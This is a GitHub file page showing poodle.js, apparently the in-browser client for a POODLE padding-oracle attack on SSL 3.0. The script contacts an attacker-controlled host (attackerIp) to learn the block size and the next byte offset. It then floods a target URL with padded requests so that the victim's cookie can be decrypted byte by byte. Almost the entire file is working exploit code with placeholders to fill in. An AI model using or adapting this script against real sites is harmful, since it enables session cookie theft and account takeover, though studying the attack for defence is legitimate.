-
Notifications
You must be signed in to change notification settings - Fork 7
Expand file tree
/
Copy pathpoodle.js
More file actions
65 lines (57 loc) · 2.1 KB
/
Copy pathpoodle.js
File metadata and controls
65 lines (57 loc) · 2.1 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
<script>
// Need to replace:
// attackerIp
// targetUrl
var blockSize = null;
function sendRequest(method, url, data, callback, errorcallback, timeout) {
var request = new XMLHttpRequest();
request.open(method || 'GET', url);
request.responseType = 'text';
request.timeout = timeout || 5000;
request.onload = function() {
callback && callback(request.responseText);
}
request.onerror = function() {
errorcallback && errorcallback(request.status, request.statusText)
}
// Make Content-Size minimum 100 so that there is space to grow without changing the length of the Content-Size header
request.send(Array(101).join('a') + data);
}
function attackByte(dataLengthNeeded) {
// Ask the server what we should attack next
sendRequest('GET', 'http://' + attackerIp + "/offset", null, function(response) {
var offset = parseInt(response, 10);
data = "";
path = "";
if (offset > dataLengthNeeded) dataLengthNeeded += blockSize;
var path = Array(offset + 1).join("a");
var data = Array(dataLengthNeeded - offset + 1).join("a");
var done = false;
var attackerInterval = setInterval(function() {
sendRequest('POST', targetUrl + "/" + path, data, function() {
if (done) return;
done = true;
clearInterval(attackerInterval);
attackByte(dataLengthNeeded); // On success, ask for next offset recursively and repeat
});
}, 100)
});
}
// Get block size
var blockSizeString = ""
sendRequest('GET', 'http://' + attackerIp + "/blocksize", null, function (response) {
blockSize = parseInt(response.split(' ')[0], 10);
var dataLengthNeeded = parseInt(response.split(' ')[1], 10);
// Add the block size to make sure that we have enough room
// to shift the cookie as much as we want
attackByte(dataLengthNeeded + blockSize);
}, null, 30000);
// This will only run if the server does not immediately return a block size
// which would indicate that this is the first client to connect back
function sendBlockSizeRequest() {
if (blockSize !== null) return;
blockSizeString += "a"
sendRequest('GET', targetUrl + "/" + blockSizeString, null, sendBlockSizeRequest);
}
sendBlockSizeRequest();
</script>